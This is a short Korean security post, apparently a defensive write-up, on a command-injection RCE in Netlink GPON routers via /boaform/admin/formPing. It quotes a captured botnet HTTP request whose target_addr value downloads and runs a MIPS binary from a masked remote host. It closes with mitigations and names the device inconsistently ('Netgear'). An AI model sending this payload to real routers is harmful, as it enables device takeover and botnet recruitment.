loading
본문으로 바로가기

Netlink GPON은 국내의 가장에서 사용하는 iptime과 같은 와이파이 모뎀입니다.  
해당 Netlink 모델에서 원격 코드 실행 취약점이 존재하였습니다. 

 

Netgear 라우터는 원격 공격자가 / boaform / admin / formPing URI에 의한 잘못된 입력 유효성 검사로 인해 시스템에서 임의의 코드를 실행할 수있게 합니다. 

공격자는 특수하게 조작 된 요청을 보내이 취약점을 악용하여 시스템에서 임의의 코드를 실행할 수 있습니다

 

1. Payload

/boaform/admin/formPing

 

2. 공격구문

POST /boaform/admin/formPing HTTP/1.1
User-Agent: polaris botnet
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

target_addr=;cd /tmp; rm viktor.mips; wget http://xxx.xxx.xxx.xxx:6479/bins/viktor.mips; busybox wget http://xxx.xxx.xxx.xxx:6479/bins/viktor.mips; chmod 777 viktor.mips; ./viktor.mips/&waninf=1_INTERNET_R_VID_154

Polaris botnet은 해커가 User-Agent 이름을 바꾸어 사용하는 경우가 대부분이며 RawData의 정/오탐을 판별 후, 확인이 필요한 부분이다.

 

formPing()은 웹 서버 프로그램 의 기능 에서 /bin/boaform 요청을 처리 할 때 시스템 ping 명령을 호출하기 전에 매개 변수를 /boaform/admin/forming에서 확인하지 않아 target_addr 명령 삽입이 가능해집니다.

그래서 취약한 시스템을 제어할 수 있습니다.

 

※ 해결방안

1. 장치 펌웨어를 확인 및 업데이트하고 비활성화해야하는 기본 계정이 있는지 확인해야합니다.

2. 적용 가능한 네트워크에서 다음 IoC를 모니터링하고 차단하는 것이 좋습니다.